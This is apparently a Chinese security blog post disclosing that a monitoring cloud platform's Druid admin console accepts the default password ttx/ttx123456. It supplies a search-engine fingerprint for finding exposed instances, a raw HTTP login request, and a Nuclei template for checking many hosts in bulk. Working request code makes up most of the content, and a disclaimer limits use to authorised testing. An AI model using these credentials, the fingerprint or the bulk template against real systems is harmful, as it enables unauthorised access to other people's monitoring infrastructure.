更多干货POC获取,请关注公众号:如棠安全
Nx01 阅读须知
如棠安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
Nx02 漏洞描述
鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。
Nx03 系统指纹
hunter:web.body="./open/webApi.html
Nx05 漏洞复现
隐患地址:/druid/
弱口令:ttx/ttx123456.
POST /druid/submitLogin HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 42
Connection: close
Cookie: JSESSIONID=4F7D8A071EAC19E6196D1775D84D2F8D
loginUsername=ttx&loginPassword=ttx123456.
Nx06 批量验证脚本
id: rutanganquan
info:
name: rutanganquan
author: m0be1
severity: critical
variables:
test: "{{to_lower(rand_base(5))}}"
http:
- raw:
- |
POST /druid/submitLogin HTTP/1.1
Host: {{Hostname}}
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Origin: http://{{Hostname}}
Cookie: JSESSIONID=B94D551022416A1706761A9CBA8AB7EC
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://{{Hostname}}/druid/login.html
Accept-Encoding: gzip, deflate
Content-Length: 42
loginUsername=ttx&loginPassword=ttx123456.
matchers:
- type: dsl
dsl:
- 'status_code==200 && contains_all(body,"success")'